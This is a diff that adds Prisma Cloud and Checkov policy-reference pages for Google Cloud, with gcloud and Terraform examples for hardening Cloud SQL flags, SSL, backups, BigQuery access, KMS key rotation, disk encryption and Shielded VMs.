+ERROR is considered the best practice setting.
+Changes should only be made in accordance with the organization's logging policy.
+
+
+////
+=== Fix - Runtime
+
+
+*GCP Console*: To change the policy using the GCP Console, follow these steps:
+
+
+
+. Log in to the GCP Console at https://console.cloud.google.com.
+
+. Navigate to https://console.cloud.google.com/sql/instances[Cloud SQL Instances].
+
+. Select the *PostgreSQL instance* where the database flag needs to be enabled.
+
+. Click *Edit*.
+
+. Scroll down to the *Flags* section.
+
+. To set a flag that has not been set on the instance before, click *Add item*.
+
+. Select the flag *log_min_error_statement* from the drop-down menu, and set an appropriate value.
+
+. Click *Save*.
+
+. Confirm the changes in the *Flags* section on the *Overview* page.
+
+
+*CLI Command*
+
+
+
+. List all Cloud SQL database instances using the following command: `gcloud sql instances list`
+
+. 
Configure the log_min_error_statement database flag for every Cloud SQL PostgreSQL database instance using the following command.
++
+`gcloud sql instances patch INSTANCE_NAME --database-flags log_min_error_statement=<DEBUG5|DEBUG4|DEBUG3|DEBUG2|DEBUG1|INFO|NOTICE|WARNING|ERROR|LOG|FATAL|PANIC>`
++
+NOTE: This command will overwrite all database flags previously set. To keep those and add new ones, include the values for all flags to be set on the instance;
+any flag not specifically included is set to its default value.
+For flags that do not take a value, specify the flag name followed by an equals sign (*=*).
+
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_sql_database_instance
+* *Arguments:* database_version = "POSTGRES_* " settings::database_flags: key:"log_min_messages", value: by default set to "ERROR" Argument value can be one of the following: `DEBUG5`, `DEBUG4`, `DEBUG3`, `DEBUG2`, `DEBUG1`, `INFO`, `NOTICE`, `WARNING`, `ERROR`, `LOG`, `FATAL`, and `PANIC`
+
+
+[source,go]
+----
+resource "google_sql_database_instance" "default" {
+  name             = "master-instance"
+  database_version = "POSTGRES_11"
+  region           = "us-central1"
+
+  settings {
+    database_flags {
+      name  = "log_min_messages"
+      value = "DEBUG5"
+    }
+  }
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-7.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-7.adoc
new file mode 100644
index 000000000..57d25b1de
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-7.adoc
@@ -0,0 +1,113 @@
+== GCP PostgreSQL instance database flag log_temp_files is not set to 0
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 2b9b082c-7e83-4695-92ab-8eca4c5dd4fd
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py[CKV_GCP_56]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+PostgreSQL can create a temporary file for actions such as sorting, hashing and temporary query results when these operations exceed *work_mem*.
+The *log_temp_files* flag controls whether a temporary file's name and size are logged when it is deleted.
+Configuring *log_temp_files* to zero (*0*) causes all temporary file information to be logged, while positive values log only files whose size is greater than or equal to the specified number of kilobytes.
+A value of *-1* disables temporary file information logging.
+We recommend you set the *log_temp_files* database flag for Cloud SQL PostgreSQL instances to zero (*0*).
+If temporary files are not logged, it may be difficult to identify potential performance issues caused by either poor application coding, or deliberate resource starvation attempts.
+
+////
+=== Fix - Runtime
+
+
+*GCP Console*: To change the policy using the GCP Console, follow these steps:
+
+
+
+. Log in to the GCP Console at https://console.cloud.google.com.
+
+. Navigate to https://console.cloud.google.com/sql/instances[Cloud SQL Instances].
+
+. Select the *PostgreSQL instance* where the database flag needs to be enabled.
+
+. Click *Edit*.
+
+. Scroll down to the *Flags* section.
+
+. To set a flag that has not been set on the instance before, click *Add item*.
+
+. Select the flag *log_temp_files* from the drop-down menu, and set its value to *0*.
+
+. Click *Save*.
+
+. Confirm the changes in the *Flags* section on the *Overview* page.
+
+
+*CLI Command*
+
+
+
+. List all Cloud SQL database instances using the following command: `gcloud sql instances list`
+
+. Configure the log_temp_files database flag for every Cloud SQL PostgreSQL database instance using the following command.
++
+`gcloud sql instances patch INSTANCE_NAME --database-flags log_temp_files=0`
++
+NOTE: This command will overwrite all database flags previously set.
+To keep those and add new ones, include the values for all flags to be set on the instance;
+any flag not specifically included is set to its default value.
+For flags that do not take a value, specify the flag name followed by an equals sign (*=*).
+////
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_sql_database_instance
+* *Arguments:* database_version = "POSTGRES_* " settings::database_flags: key:"log_temp_files", value: by default set to "-1"
+
+
+[source,go]
+----
+resource "google_sql_database_instance" "default" {
+  name             = "master-instance"
+  database_version = "POSTGRES_11"
+  region           = "us-central1"
+
+  settings {
+    database_flags {
+      name  = "log_temp_files"
+      value = "0"
+    }
+  }
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-8.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-8.adoc
new file mode 100644
index 000000000..907a3bf6a
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-8.adoc
@@ -0,0 +1,107 @@
+== GCP PostgreSQL instance database flag log_min_duration_statement is not set to -1
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 45f30dc1-4253-4afb-987a-b09e26bfc166
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py[CKV_GCP_57]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Logging SQL statements may include sensitive information that should not be recorded in logs.
+This recommendation is applicable to PostgreSQL database instances.
+The *log_min_duration_statement* database flag defines the minimum execution time, in milliseconds, above which the full duration of a statement is logged.
+We recommend you ensure the *log_min_duration_statement* database flag for Cloud SQL PostgreSQL instances is disabled.
+To achieve this, set the value to *-1*.
+
+////
+=== Fix - Runtime
+
+
+*GCP Console*: To change the policy using the GCP Console, follow these steps:
+
+
+
+. Log in to the GCP Console at https://console.cloud.google.com.
+
+. Navigate to https://console.cloud.google.com/sql/instances[Cloud SQL Instances].
+
+. Select the *PostgreSQL instance* where the database flag needs to be enabled.
+
+. Click *Edit*.
+
+. Scroll down to the *Flags* section.
+
+. To set a flag that has not been set on the instance before, click *Add item*.
+
+. Select the flag *log_min_duration_statement* from the drop-down menu, and set its value to *-1*.
+
+. Click *Save*.
+
+. Confirm the changes in the *Flags* section on the *Overview* page.
+
+
+*CLI Command*
+
+
+
+. List all Cloud SQL database instances using the following command: `gcloud sql instances list`
+
+. Configure the `log_min_duration_statement` flag for every Cloud SQL PostgreSQL database instance using the following command: `gcloud sql instances patch INSTANCE_NAME --database-flags log_min_duration_statement=-1`
++
+NOTE: This command will overwrite all database flags previously set. To keep those and add new ones, include the values for all flags to be set on the instance; any flag not specifically included is set to its default value.
+For flags that do not take a value, specify the flag name followed by an equals sign (*=*).
+
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_sql_database_instance
+* *Arguments:* database_version = "POSTGRES_* " settings::database_flags: key:"log_min_duration_statement", value: by default set to -1
+
+
+[source,go]
+----
+resource "google_sql_database_instance" "default" {
+  name             = "master-instance"
+  database_version = "POSTGRES_11"
+  region           = "us-central1"
+
+  settings {
+    database_flags {
+      name  = "log_min_duration_statement"
+      value = "-1"
+    }
+  }
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-9.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-9.adoc
new file mode 100644
index 000000000..2c720193d
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-9.adoc
@@ -0,0 +1,111 @@
+== GCP SQL Server instance database flag 'cross db ownership chaining' is enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| fc6634c3-7ab9-4a84-a447-09499b1e418c
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py[CKV_GCP_58]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Use the *cross db ownership chaining* database flag to configure cross-database ownership chaining for an instance of Microsoft SQL Server.
+This server option allows you to control cross-database ownership chaining at the database level, or to allow cross-database ownership chaining for all databases.
+We recommend you disable the *cross db ownership chaining* flag for Cloud SQL SQL Server instances by setting it to *Off*.
+Enabling *cross db ownership chaining* is only effective when all of the databases hosted by the instance of SQL Server participate in cross-database ownership chaining, and you are aware of the security implications of this setting.
+
+////
+=== Fix - Runtime
+
+
+*GCP Console*: To change the policy using the GCP Console, follow these steps:
+
+
+
+. Log in to the GCP Console at https://console.cloud.google.com.
+
+. Navigate to https://console.cloud.google.com/sql/instances[Cloud SQL Instances].
+
+. Select the *SQL Server instance* where the database flag needs to be enabled.
+
+. Click *Edit*.
+
+. Scroll down to the *Flags* section.
+
+. To set a flag that has not been set on the instance before, click *Add item*.
+
+. Select the flag *cross db ownership chaining* from the drop-down menu, and set its value to *Off*.
+
+. Click *Save*.
+
+. Confirm the changes in the *Flags* section on the *Overview* page.
+
+
+*CLI Command*
+
+
+
+. List all Cloud SQL database instances using the following command: `gcloud sql instances list`
+
+. Configure the *cross db ownership chaining* database flag for every Cloud SQL SQL Server database instance using the following command:
+----
+gcloud sql instances patch INSTANCE_NAME \
+--database-flags "cross db ownership chaining=off"
+----
++
+NOTE: This command will overwrite all database flags previously set. To keep those flags, and add new ones, include the values for all flags to be set on the instance.
+Any flag not specifically included is set to its default value.
+For flags that do not take a value, specify the flag name followed by an equals sign (*=*).
+
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_sql_database_instance
+* *Arguments:* database_version = "SQLSERVER_* " settings::database_flags: key:"cross db ownership chaining", value: by default set to "on"
+
+
+[source,go]
+----
+resource "google_sql_database_instance" "default" {
+  name             = "master-instance"
+  database_version = "SQLSERVER_2017_STANDARD"
+  region           = "us-central1"
+
+  settings {
+    database_flags {
+      name  = "cross db ownership chaining"
+      value = "off"
+    }
+  }
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/cloud-sql-policies.adoc b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/cloud-sql-policies.adoc
new file mode 100644
index 000000000..f8f5178fc
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/cloud-sql-policies/cloud-sql-policies.adoc
@@ -0,0 +1,64 @@
+== Cloud SQL Policies
+
+[width=85%]
+[cols="1,1,1"]
+|===
+|Policy|Checkov Check ID| Severity
+
+|xref:bc-gcp-sql-1.adoc[GCP MySQL instance with local_infile database flag is not disabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py[CKV_GCP_50]
+|LOW
+
+
+|xref:bc-gcp-sql-10.adoc[GCP SQL Server instance database flag 'contained database authentication' is enabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py[CKV_GCP_59]
+|MEDIUM
+
+
+|xref:bc-gcp-sql-11.adoc[GCP Cloud SQL database instances have public IPs]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py[CKV_GCP_60]
+|LOW
+
+
+|xref:bc-gcp-sql-2.adoc[GCP PostgreSQL instance with log_checkpoints database flag is disabled]
+| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py[CKV_GCP_51] +|LOW + + +|xref:bc-gcp-sql-3.adoc[GCP PostgreSQL instance database flag log_connections is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py[CKV_GCP_52] +|LOW + + +|xref:bc-gcp-sql-4.adoc[GCP PostgreSQL instance database flag log_disconnections is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py[CKV_GCP_53] +|LOW + + +|xref:bc-gcp-sql-5.adoc[GCP PostgreSQL instance database flag log_lock_waits is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py[CKV_GCP_54] +|LOW + + +|xref:bc-gcp-sql-6.adoc[GCP PostgreSQL instance database flag log_min_messages is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py[CKV_GCP_55] +|LOW + + +|xref:bc-gcp-sql-7.adoc[GCP PostgreSQL instance database flag log_temp_files is not set to 0] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py[CKV_GCP_56] +|LOW + + +|xref:bc-gcp-sql-8.adoc[GCP PostgreSQL instance database flag log_min_duration_statement is not set to -1] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py[CKV_GCP_57] +|LOW + + +|xref:bc-gcp-sql-9.adoc[GCP SQL Server instance database flag 'cross db ownership chaining' is enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py[CKV_GCP_58] +|MEDIUM + + +|=== + diff --git 
a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-1.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-1.adoc new file mode 100644 index 000000000..19f11ec33 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-1.adoc @@ -0,0 +1,62 @@ +== GCP SQL Instances do not have SSL configured for incoming connections + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b497449f-7a19-49e0-a715-8d0cc95090e9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py[CKV_GCP_6] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Cloud SQL is a fully managed relational database service for MySQL, PostgreSQL and SQL Server. +It offers data encryption at rest and in transit, Private connectivity with VPC and user-controlled network access with firewall protection. +Cloud SQL creates a server certificate automatically when a new instance is created. +We recommend you enforce all connections to use SSL/TLS. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +resource "google_sql_database_instance" "main" { + name = "main-instance" + database_version = "POSTGRES_14" + region = "us-central1" + + settings { + # Second-generation instance tiers are based on the machine + # type. See argument reference below. 
+ tier = "db-f1-micro" + ip_configuration { + require_ssl = true + } + } +} +---- + + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-2.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-2.adoc new file mode 100644 index 000000000..23026cd29 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-2.adoc @@ -0,0 +1,54 @@ +== GCP SQL database instance does not have backup configuration enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8c45d706-65cc-440f-a60c-d635a3ad503a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py[CKV_GCP_14] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Cloud SQL is a fully managed relational database service for MySQL, PostgreSQL and SQL Server. +It offers data encryption at rest and in transit, Private connectivity with VPC and user-controlled network access with firewall protection. +Backups provide a way to restore a Cloud SQL instance to recover lost data or recover from a problem with your instance. +We recommend you enable automated backups for instances that contain data of high importance. 
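+ +For PostgreSQL instances, automated backups can also be paired with point-in-time recovery. A minimal sketch, assuming an illustrative instance name (`point_in_time_recovery_enabled` applies to PostgreSQL instances): + +[source,go] +---- +resource "google_sql_database_instance" "example" { + name = "example-instance" + database_version = "POSTGRES_14" + region = "us-central1" + + settings { + tier = "db-f1-micro" + backup_configuration { + // Automated backups must be enabled for point-in-time recovery + enabled = true + point_in_time_recovery_enabled = true + } + } +} +----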
+ +=== Fix - Buildtime + + +*Terraform* + + +[source,go] +---- +resource "google_sql_database_instance" "main" { + name = "main-instance" + database_version = "POSTGRES_14" + region = "us-central1" + settings { + backup_configuration { + enabled = true + } + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-3.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-3.adoc new file mode 100644 index 000000000..a7385d22e --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-3.adoc @@ -0,0 +1,92 @@ +== GCP BigQuery dataset is publicly accessible + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 181a00f7-9ca4-45a7-9e2a-b8ebd12223ff + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py[CKV_GCP_15] + +|Severity +|HIGH + +|Subtype +|Build +//Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +* GCP BigQuery dataset is publicly accessible* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 181a00f7-9ca4-45a7-9e2a-b8ebd12223ff + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py[CKV_GCP_15] + +|Severity +|HIGH + +|Subtype +|Build +, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== +//// + + +=== Description + + +Dataset-level permissions help determine which users, groups, and service accounts are allowed to access tables, views, and table data in a specific BigQuery dataset. +You can configure BigQuery permissions at a higher level in the Cloud IAM resource hierarchy. +Your configurations are inherited and based on the IAM structure you select to apply. 
+We recommend you ensure private datasets remain private by avoiding the *All Authenticated Users* option which gives all Google account holders access to the dataset, and makes the dataset public. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +resource "google_bigquery_dataset" "pass_special_group" { + dataset_id = "example_dataset" + friendly_name = "test" + description = "This is a test description" + location = "US" + + access { + role = "READER" + special_group = "projectReaders" + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-4.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-4.adoc new file mode 100644 index 000000000..9e331817a --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-4.adoc @@ -0,0 +1,102 @@ +== GCP KMS Symmetric key not rotating in every 90 days + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 287ab1bc-62f5-4b2c-92a7-43c9ee7c6bb6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py[CKV_GCP_43] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Google Cloud Key Management Service stores cryptographic keys in a hierarchical structure designed for access control management. +The format for the rotation schedule depends on the client library used. +In Terraform, the rotation period unit must be seconds. +A key is a named object representing a cryptographic key used for a specific purpose, including data protection. +The key material, the actual bits used for encryption, can change over time as new key versions are created. 
+A collection of files could be encrypted with the same key and people with decrypt permissions on that key would be able to decrypt those files. +We recommend you set a key rotation period, including start time. +A key can be created with a specified rotation period, which is the time when new key versions are generated automatically. +A key can also be created with a specified next rotation time. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/security/kms [Cryptographic Keys]. + +. Select the specific key ring. + +. From the list of keys, select the specific key and Click on the blade (3 dots) on the right side of the pop up. + +. Click * Edit rotation period*. + +. On the pop-up window, * Select a new rotation period* in days; ++ +this should be less than 90 days. ++ +Then select a * Starting on* date; ++ +this is when the rotation period begins. 
+ + +*CLI Command* + + +Update and schedule rotation by *ROTATION_PERIOD* and *NEXT_ROTATION_TIME* for each key: +---- +gcloud kms keys update KEY_NAME +--keyring=KEY_RING +--location=LOCATION +--next-rotation-time=NEXT_ROTATION_TIME +--rotation-period=ROTATION_PERIOD +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_kms_crypto_key +* *Arguments:* rotation_period + + +[source,go] +---- +resource "google_kms_crypto_key" "key" { + name = "crypto-key-example" + key_ring = google_kms_key_ring.keyring.id + rotation_period = "7776000s" +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-x.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-x.adoc new file mode 100644 index 000000000..2feebb4a6 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-x.adoc @@ -0,0 +1,120 @@ +== GCP VM disks not encrypted with Customer-Supplied Encryption Keys (CSEK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 952d8fdc-ad1f-4c19-ab00-1258d2745424 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py[CKV_GCP_37] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage and Google Compute Engine. +Google Compute Engine encrypts all data at rest by default. +Compute Engine handles and manages this encryption automatically, with no additional action required. +When you provide your own encryption keys Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data. 
+Only users that provide the correct key can use resources protected by a customer-supplied encryption key. +Google does not store your keys on its servers and cannot access your protected data unless you provide the key. +If you forget or lose your key Google is unable to recover the key or to recover any data encrypted with that key. +To control and manage this encryption yourself, you must provide your own encryption keys. +We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt business critical VM disks. +This helps protect the Google-generated keys used to encrypt and decrypt your data. + +//// +=== Fix - Runtime + + +* GCP Console Currently there is no way to update the encryption of an existing disk.* + + +Ensure you create new disks with Encryption set to Customer supplied. +To change the policy using the GCP Console, follow these steps: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/compute/disks [Compute Engine Disks]. + +. Click * CREATE DISK*. + +. Set * Encryption type* to * Customer supplied*. + +. In the dialog box, enter the * Key*. + +. Select * Wrapped key*. + +. Click * Create*. + + +* CLI Command* + + +In the gcloud compute tool, encrypt a disk, use the following command: `--csek-key-file flag during instance creation` +If you are using an RSA-wrapped key, use the gcloud beta component and the following command: +---- +gcloud (beta) compute instances create INSTANCE_NAME +--csek-key-file & lt;example-file.json> +---- +To encrypt a standalone persistent disk, use the following command: +---- +gcloud (beta) compute disks create DISK_NAME +--csek-key-file & lt;examplefile.json> +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_disk +* *Field:* disk_encryption_key + + +[source,go] +---- +// Option 1 +resource "google_compute_disk" "default" { + + ... 
+ + // Provide exactly one of raw_key or kms_key_self_link (values elided) + disk_encryption_key { + raw_key = + kms_key_self_link = + } + +} + +// Option 2 +resource "google_compute_instance" "default" { + + ... + + boot_disk { + disk_encryption_key_raw = + } +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-y.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-y.adoc new file mode 100644 index 000000000..3ae9f9a47 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-y.adoc @@ -0,0 +1,111 @@ +== GCP VM instance with Shielded VM features disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 17ad5166-9858-47e8-85ea-e42575a2112e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py[CKV_GCP_39] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Shielded VMs are virtual machines (VMs) on Google Cloud Platform hardened by a set of security controls that help defend against rootkits and bootkits. +Shielded VM offers verifiable integrity on your Compute Engine VM instances, so you can be confident your instances have not been compromised by boot- or kernel-level malware or rootkits. +The verifiable integrity of a Shielded VM is achieved through the use of Secure Boot and integrity monitoring; see below for further details. +We recommend you launch Compute instances with Shielded VM enabled to defend against advanced threats, and ensure that the boot loader and firmware on your VMs are signed and untampered. +Shielded VM instances run firmware signed and verified using Google's Certificate Authority, ensuring the instance's firmware is unmodified and the root of trust for Secure Boot is established. 
+*Secure Boot* helps ensure that the system only runs authentic software by verifying the digital signature of all boot components and halting the boot process if signature verification fails. +*Integrity monitoring* helps you understand and make decisions about the state of your VM instances. +The Shielded VM virtual trusted platform module (vTPM) enables Measured Boot by performing the measurements needed to create the integrity policy baseline used for comparison with measurements from subsequent VM boots to determine any changes. + +//// +=== Fix - Runtime + + +*GCP Console* To change the policy using the GCP Console, follow these steps: + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/compute/instances[VM instances]. + +. Select the _instance name_ to view the *VM instance details* page. + +. Stop the instance by clicking *STOP*. + +. When the instance has stopped, click *EDIT*. + +. In the *Shielded VM* section, turn on both *vTPM* and *Integrity Monitoring*. + +. Optionally, if you do not use any custom or unsigned drivers on the instance, turn on *Secure Boot*. + +. To modify the instance, click *SAVE*. + +. To restart the instance, click *START*. + + +*CLI Command* + + +You can only enable Shielded VM options on instances that have Shielded VM support. +For a list of Shielded VM public images, run the gcloud compute images list command with the following flags: _gcloud compute images list --project gce-uefi-images --no-standard-images_ + +. To stop the instance, use the following command: `gcloud compute instances stop INSTANCE_NAME` + +. To update the instance, use the following command: `gcloud compute instances update INSTANCE_NAME --shielded-vm-vtpm --shielded-vm-integrity-monitoring` + +. 
Optionally, if you do not use any custom or unsigned drivers on the instance, to turn on secure boot use the following command: `gcloud compute instances update INSTANCE_NAME --shielded-vm-secure-boot` + +. To restart the instance, use the following command: `gcloud compute instances start INSTANCE_NAME` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_instance +* *Arguments:* enable_integrity_monitoring and enable_vtpm - both are set to true by default and should not be overridden, i.e. should not be set to false. + + +[source,go] +---- +resource "google_compute_instance" "default" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" + boot_disk {} + shielded_instance_config { + enable_integrity_monitoring = true + enable_vtpm = true + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/encrypt-boot-disks-for-instances-with-cseks.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/encrypt-boot-disks-for-instances-with-cseks.adoc new file mode 100644 index 000000000..90a5018f6 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/encrypt-boot-disks-for-instances-with-cseks.adoc @@ -0,0 +1,141 @@ +== Boot disks for instances do not use CSEKs + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1d7dcc71-2237-45ca-8ec3-7f8e71eb8444 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py[CKV_GCP_38] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage and Google Compute Engine. +Google Compute Engine encrypts all data at rest by default. +Compute Engine handles and manages this encryption automatically, with no additional action required. +When you provide your own encryption keys Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data. +Only users that provide the correct key can use resources protected by a customer-supplied encryption key. +Google does not store your keys on its servers and cannot access your protected data unless you provide the key. +If you forget or lose your key Google is unable to recover the key or to recover any data encrypted with that key. +To control and manage this encryption yourself, you must provide your own encryption keys. +We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt boot disks for instances. +This helps protect the Google-generated keys used to encrypt and decrypt your data. + +//// +=== Fix - Runtime + + +*GCP Console* Currently there is no way to update the encryption of an existing disk. + + +Ensure you create new disks with Encryption set to Customer supplied. +To change the policy using the GCP Console, follow these steps: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/compute/disks[Compute Engine Disks]. + +. Click *CREATE DISK*. + +. Set *Encryption type* to *Customer 